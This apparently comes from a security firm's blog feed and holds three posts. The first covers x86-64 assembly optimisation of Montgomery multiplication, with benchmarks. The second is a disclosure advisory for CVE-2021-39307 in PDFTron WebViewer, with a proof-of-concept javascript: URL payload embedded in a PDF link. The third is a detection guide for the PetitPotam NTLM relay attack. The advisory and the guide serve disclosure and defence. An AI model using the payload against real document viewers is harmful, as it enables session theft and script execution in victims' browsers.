https://commons.wikimedia.org/w/index.php?curid=2541872 CC BY-SA 3.0

There are four interesting things to observe in the diagram above.

  1. The (pink) instruction fetch logic is capable of supplying six instructions from the fetch buffer to the instruction queue per cycle. Clearly the intent is to keep the multiple parallel execution units downstream (described next) stuffed full of work.
  2. The (yellow) execution units are capable of executing multiple similar and dissimilar operations in parallel. The configuration is intended to support many simple and frequent operations separately from the fewer, more complex and rarer operations. The various operations will clearly involve very different throughput and latency characteristics.
  3. The (salmon) reservation station helps manage the operand dependencies between instructions, and the register alias table allows for more physical registers than logical registers. The adjacent reorder buffer and retirement register file logic allows instructions to execute out-of-order but get committed in-order. While humans typically think in a nice orderly step-by-step fashion, the actual instruction execution patterns can go wildly out-of-order (provided they are ultimately finalized in-order).
  4. While the specific individual pipeline stages are not shown, modern processors have very deep pipelines and thus require extensive branch prediction logic to minimize overhead from mispredictions. This is pertinent to unrolling small loops.

The four items above allow the processor to extract a large amount of the underlying instruction-level parallelism throughout each of the fetch, decode, execute and finalize/retire steps. It is quite fantastic that all of this complexity is effectively hidden from the application programmer. A bigger, better and newer micro-architecture should simply result in better performance on strictly unchanged code.

CPU Architecture

In some cases, specialized instructions are added to the programming model that provide significant speed-up for very specific algorithms. While many people first think of the very well-known ‘Intel MMX instructions for multimedia algorithms’, there have been many other less prominent instances over the years. Intel’s ADX (Multi-Precision Add-Carry Instruction Extensions) feature provides two new addition instructions that can help increase the performance of arbitrary precision arithmetic. Intel’s BMI2 (Bit Manipulation Instruction Set 2) feature contains a new flag-friendly multiplication instruction among several others not relevant to our purpose. Processors supporting these feature extensions have been shipping since roughly 2015, and may offer a significant performance benefit.

The ‘native’ Montgomery multiplication Rust code last shown above involved a large amount of addition operations (outside of the array index calculation) centered around lines 112-114, 118, 124-125 and 129. These operations are building larger-precision results (e.g., a full partial product) from smaller-precision instructions (e.g., a 64-bit add). Normally, a series of ‘Add with carry’ (ADC) instructions are used that add two operands and the carry(in) flag to produce a sum and a new carry(out) flag. The instructions are ordered to work on the least-to-most significant operand limb one at a time. The dependence upon a single carry flag presents a bottleneck that allows just one chain to operate at a time in principle, thus limiting parallelism.

Intel realized the limitation of a single carry flag, and introduced two instructions that effectively use different carry flags. This allows the programmer to express more instruction-level parallelism by describing two chains that can be operating at the same time. The ADX instruction extensions provide:

  • ADCX Adds two 64-bit unsigned integer operands plus the carry flag and produces a 64-bit unsigned integer result with the carry out value set in the carry flag. This does not affect any other flags (as the prior ADD instructions did).
  • ADOX Adds two 64-bit unsigned integer operands plus the overflow flag and produces a 64-bit unsigned integer result with the carry out value set in the overflow flag. This does not affect any other flags. Note that ordinarily the overflow flag is used with signed arithmetic.

Meanwhile, the Rust code also contains a significant amount of multiplication operations interspersed amongst the addition operations noted above. The ordinary MUL instruction multiplies two 64-bit unsigned integer operands to produce a 128-bit result placed into two destination registers. However, this result also affects the carry and overflow flags – meaning it will interfere with our ADCX and ADOX carry chains. Furthermore, the output registers must be %rax and %rdx which limits flexibility and constrains register allocation. To address this, the BMI2 instruction extensions include:

  • MULX Multiplies two 64-bit unsigned integer operands and produces an unsigned 128-bit integer result stored into two destination registers. The flags are not read nor written, thus enabling the interleaving of add-with-carry operations and multiplications.

The two new addition instructions inherently overwrite one of the source registers with the destination result. In other words, adcxq %rax, %r10 will add %rax to %r10 with the carry flag, and place the result into %r10 and the carry flag. The new multiplication instruction requires one of its source operands to always be in %rdx. In other words, mulxq %rsi, %rax, %rbx is the multiplication of %rsi by %rdx with the lower half of the result written into %rax and the upper half written into %rbx. The q suffix on each instruction is simply the quadword suffix syntax of the GNU Assembler.

Register Allocation

The three new instructions described above will form the core of the Montgomery multiplication function in assembly. Since the x86 instruction set is rather register constrained, a strategy that minimizes the actual working set of active values must be developed. We saw earlier how only seven limbs of temp are in play at any one time and the outer loop index i formed a base address when accessing temp. Consider a ‘middle’ iteration of the outer loop, as the simpler first iteration can be derived from this. This flattened iteration is implemented as an assembler macro that can be later placed singly inside an outer loop or in multiple back-to-back instances that unroll the outer loop.

The first inner loop calculating the partial product will be unrolled and assumes temp[i + 0..6] (exclusive) arrives in registers %r10 through %r15. The %rax and %rbx registers will temporarily hold multiplication results as we step through a.v[0..6] * b.v[i] (with a fixed i). The a.v[0..6] (exclusive) operands will involve a relative address using %rsi as the base, while the fixed operand will be held in %rdx. At the end of the inner loop, the %rbp register will be used to hold temp[i + 6].

The second inner loop implementing the reduction step will also be unrolled and assumes temp[i + 0..7] (exclusive) is provided in the registers %r10 through %r15 along with %rbp. The register strategy for holding the multiplication results is modified slightly here due to A) the add instruction requiring a source operand being overwritten by the result, and B) the calculation process effectively shifts the working set to the right by one step (thus the least significant value will drop away, but its carry out will still propagate).

Basic Register Allocation Structure/Plan

The general plan for register allocation within one ‘middle’ iteration of the outer loop is shown above in simplified fashion. The upper crimson triangle implements the partial product inner loop and is executed first. The lower green triangle implements the reduction step and executes second. Double-width boxes hold the multiplication results, and the red/green arrows identify the two separate carry chains of the addition instructions. The nearly side-by-side placement of the addition operations is meant to hint at their parallel operation. While things visually appear to step forward in a nice orderly single-cycle progression, multiplication latencies are significantly higher than addition so the out-of-order capabilities of the micro-architecture is crucial to performance. The output data within %r10 through %r15 is compatible with input data within %r10 through %r15, so instances of this block can be repeated one after another.

The initial iteration of the outer loop is a simplification of that shown above. Simply assume %r10 through %r15 start at zero and remove everything no longer needed.

Montgomery Multiplication in Assembly

The bulk of the hard work has now been done. A macro implementing one iteration of the outer loop in x86-64 assembly is shown below. The fully unrolled outer loop is implemented with a simplified initial instance followed by five back-to-back instantiations of this code. [Code excerpt on GitHub]

The final Montgomery multiplication function is fully implemented in src/mont_mul_asm.S and is a straightforward concatenation of the following elements:

  1. A function label attached to the prologue. Any registers used by the function that are required to be preserved across function calls must be pushed to the stack prior to use. The label corresponds to the extern “C” clause in the Rust lib.rs source file.
  2. The MODULUS is stored as quadword constants and their address loaded into the %rcx register. These values are utilized in the reduction step.
  3. An instance of the simplified first outer loop.
  4. Five instances of the macro shown above. Note the presence of offset parameter on line 82. This is used to form an index into b.v[i] on line 84 and it is increased by 8 on each instance.
  5. The final modulus correction logic is virtually identical to what has already been seen for addition: subtract the modulus from the initial result and return that if there is no borrow, otherwise return the initial result.
  6. A function epilogue that pops the registers from the stack that were pushed there in the prologue.

Again, the full routine can be seen in its totality here on GitHub. Note that the Rust build.rs source file integrates everything with cargo such that there are no additional steps required to build.

A final aside: Unrolling Rust and intrinsics

The code repository already fully supports further experimentation with A) flattened Rust code that uses the same strategy to minimize its active working set, and B) Rust intrinsics. Let’s briefly touch on both topics before including them in the benchmarking results described next.

The assembly code can be back-ported or re-implemented back into flat/raw Rust with the same ‘register allocation’ strategy to manage the active working set and avoid declaring a temp[] array. This gives surprisingly good results and suggests that a modern micro-architecture can look even further ahead, perhaps up to 200 (simple) instructions, to extract more instruction level parallelism from separate but adjacent carry chains. Hence the old adage: “You can rarely outsmart the compiler”. Look for the fe_mont_mul_raw() function.

Alternatively, Rust provides intrinsics that specifically target the ADCX, ADOX and MULX instructions. Unfortunately, the toolchain cannot emit the first two yet. Nonetheless, the fe_mont_mul_intrinsics() function shows exactly how this is coded. The MULX instruction is indeed emitted and does deliver a significant benefit by not interfering with the flags.

Benchmarking

Everything is ready to go – let’s benchmark! Here are sample results from my machine:

$ RUSTFLAGS="--emit asm -C target-cpu=native" cargo bench
Ubuntu 20.04.2 LTS on Intel Core i7-7700K CPU @ 4.20GHz with Rust version 1.53

1. Addition X 1000 iterations                                       [3.6837 us 3.6870 us 3.6905 us]
2. Subtraction X 1000 iterations                                  [3.1241 us 3.1242 us 3.1244 us]
3. Multiplication by BigUint X 1000 iterations:            [517.54 us 517.68 us 517.85 us]
4. Multiplication in Rust (mont1 blog) X 1000 iter:     [46.037 us 46.049 us 46.064 us]
5. Multiplication in flat Rust X 1000 iterations:           [34.719 us 34.741 us 34.763 us]
6. Multiplication in Rust with intrinsics X 1000 iter:    [31.497 us 31.498 us 31.500 us]
7. Multiplication in Rust with assembly X 1000 iter:    [29.573 us 29.576 us 29.580 us]

There are three caveats to consider while interpreting the above results. First and foremost, consider these results as a qualitative sample rather than a definitive result. Second, each result is presented as minimum, nominal and maximum timing – so the key figure is the central number. Finally, each function is timed across 1000 iterations, so the timing result for a single iteration corresponds to units of nanoseconds rather than microseconds. On this machine, the Montgomery multiplication function written in assembly language takes approximately 29.576 ns.

The baseline non-Montgomery multiplication function utilizing BigUint is shown in entry 3. The (non BigUint) Montgomery multiplication function developed in the prior post is entry 4. The benefits of actively managing the working set and unrolling the inner loops can be seen in entry 5. The benefit of the MULX intrinsic appears in entry 6. Pure assembly is shown in entry 7. While the assembly routine provides more than 15X performance improvement over the BigUint reference implementation in entry 3, it also utilizes the CMOV instructions in the final correction steps to reduce timing side-channel leakage relative to all other entries.

What we learned

We started with a reference multiplication routine utilizing the BigUint library crate as our performance baseline. Then we adapted the Montgomery multiplication function in Rust from the prior blog post into an equivalent x86-64 assembly language version that is over 15X faster than the baseline. Along the way we looked at how the micro-architecture supports increased parallelism, how several new instructions in the architecture also support increased parallelism, and got insight into how to use the instructions with planned register allocations. A few hints (leading to intentionally unanswered questions) were dropped regarding the potential of raw Rust and intrinsics, with further investigation left as an exercise for the reader. Finally, we benchmarked a broad range of approaches.

The code is available publicly on GitHub, self-contained and ready for further experimentation.

What is next?

As mentioned at the start, pairing-based cryptography involves a wide range of algorithms, techniques and optimizations. This will provide a large menu of follow-on optimization topics which may ultimately include the polynomial-related functionality that zkSNARKS utilize with pairings. Stay tuned!!

Thank you

The author would like to thank Parnian Alimi, Paul Bottinelli and Thomas Pornin for detailed review and feedback. The author is solely responsible for all remaining issues.

Technical Advisory: PDFTron JavaScript URLs Allowed in WebViewer UI (CVE-2021-39307)

14 September 2021 at 13:52
Vendor: PDFTron
Vendor URL: https://www.pdftron.com/
Versions affected: WebViewer UI 8.0 or below
Systems Affected: Web applications hosting the affected software
Author: Liyun Li <liyun.li[at]nccgroup[dot]com>
CVE Identifier: CVE-2021-39307

Summary

PDFTron’s WebViewer UI 8.0 or below renders dangerous URLs as hyperlinks in supported documents, including JavaScript URLs, allowing the execution of arbitrary JavaScript code.

Impact

An attacker could steal a victim’s session tokens, log their keystrokes, steal private data, or perform privileged actions in the context of a victim’s session.

Details

JavaScript URLs are dangerous because they can be used to execute arbitrary JavaScript code when visited. Built-in PDF readers in modern browsers, such as Mozilla’s pdf.js, do not render code-execution-capable URLs as hyperlinks to avoid this issue.

To reproduce this issue, first create the following HTML document and save the rendered content as PDF on a modern browser.

<h2><a href="javascript:document.write`
  <div>
    <form method='GET' action='https://nccgroup.com'>
      <input type='submit' value='NCC Group'>
    </form>
    <script>alert(document.domain)</script>
  </div>
`">Click me</a></h2>

After that, use the “d” parameter to include the uploaded PDF file (e.g. http://webviewer-instance/#d=https://domain.tld/test.pdf).

Support for rendering clickable JavaScript and Data URLs should be removed.

Recommendation to Users

Upgrade WebViewer UI to 8.1, available at https://www.pdftron.com/documentation/web/download.

Vendor Communication

2021-08-16: Issue reported to PDFTron
2021-08-17: PDFTron confirmed the vulnerability
2021-08-23: PDFTron issued patch to nightly build
2021-09-09: PDFTron WebViewer 8.1 released 
2021-09-14: Advisory released by NCC Group

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  September 14, 2021

Written by:  Liyun Li

Detecting and Hunting for the PetitPotam NTLM Relay Attack

23 September 2021 at 18:34

Overview

During the week of July 19th, 2021, information security researchers published a proof of concept tool named “PetitPotam” that exploits a flaw in Microsoft Windows Active Directory Certificate Servers with an NTLM relay attack. The flaw allows an attacker who has already gained a foothold on the network, via another exploit or a malware infection, to gain administrative privileges on an Active Directory Certificate Server.

The following details are provided to assist organizations in detecting and threat hunting for this and other similar types of threats.

Preparation

The default Windows logging settings often do not catch advanced threats. Therefore, Windows Advanced Audit Logging must be optimally configured so that PetitPotam and similar attacks can be detected and threat hunted.

Organizations should have a standard procedure to configure the Windows Advanced Audit Policies as a part of a complete security program and have each Windows system collect locally significant events.  NCC Group recommends using the following resource to configure Windows Advanced Audit Policies:

Log rotation can be another major issue with the Windows default log settings. The default log sizes should be increased to support detection engineering and threat hunting.

Ideally, organizations should forward event logs to a log management or SIEM solution to operationalize detection alerts and provide a central console where threat hunting can be performed.  Alternatively, with optimally configured log sizes, teams can run tools such as PowerShell or LOG-MD to hunt for malicious activity against the local log data.

Detecting and Threat Hunting NTLM Relay Attacks

The PetitPotam attack targets Active Directory servers running certificate services, so this will be the focus of the detection and hunting.  Event log data is needed to detect or hunt for PetitPotam. The following settings and events can be used to detect this malicious activity:

Malicious Logins

PetitPotam will generate an odd login that can be used to detect and hunt for indications of execution.  To collect Event ID 4624, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Logon/Logoff – Audit Logon = Success and Failure

The following query logic can be used:

  • Event Log = Security
  • Event ID = 4624
  • User = ANONYMOUS LOGON
  • Authentication Package Name = NTLM*
  • Elevated Token = *1842

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • "event.code"="4624" and winlog.event_data.AuthenticationPackageName="NTLM*" and winlog.event_data.ElevatedToken="*1842" | PackageName:=winlog.event_data.AuthenticationPackageName | Token:=winlog.event_data.ElevatedToken | WS_Name:=winlog.event_data.WorkstationName | LogonProcess:=winlog.event_data.LogonProcessName | LogonType:=winlog.event_data.LogonType | ProcessName:=winlog.event_data.ProcessName | UserName:=winlog.event_data.SubjectUserName | Domain:=winlog.event_data.SubjectDomainName | TargetDomain:=winlog.event_data.TargetDomainName | TargetUser:=winlog.event_data.TargetUserName | Task:=winlog.event_data.TargetUserName | table([event.code, @timestamp, host.name, event.outcome, WS_Name, UserName, Domain, Token, PackageName, LogonProcess, LogonType, ProcessName, TargetDomain, TargetUser, Task])

Malicious Share Access

PetitPotam will generate odd network share connections that can be used to detect and hunt for indications of execution.  To collect Event ID 5145, the Windows Advanced Audit Policy will need to have the following policy enabled:

  • Object Access – Audit Detailed File Share = Success
  • Object Access – File Share = Success

The following query logic can be used:

  • Event Log = Security
  • Event ID = 5145
  • Object Name = *IPC*
  • Target Name = (“lsarpc” or “efsrpc” or “lsass” or “samr” or “netlogon”)

Sample Query

The following query is based on Elastic’s WinLogBeat version 7 agent.

  • "event.code"="5145" and winlog.event_data.ShareName=*IPC* and ("lsarpc" or "efsrpc" or "lsass" or "samr" or "netlogon" or "srvsvc")
    | Status:= keywords[0] | Src_IP:= winlog.event_data.IpAddress | PID:= winlog.process.pid | UserName:=winlog.event_data.SubjectUserName | Domain:= winlog.event_data.SubjectDomainName | Target_File:= winlog.event_data.RelativeTargetName | Path:= winlog.event_data.ShareLocalPath | Share:= winlog.event_data.ShareName | ObjectType:=winlog.event_data.ObjectType
    | table([event.code, @timestamp, host.name, Status, Src_IP, PID, UserName, Domain, task, Path, Share, Target_File, ObjectType])

If you find any false positives, validating them and excluding or refining the query may be needed.  We hope this information can assist your detection and threat hunting efforts to detect this and similar types of attacks.

Additional Reading and Resources
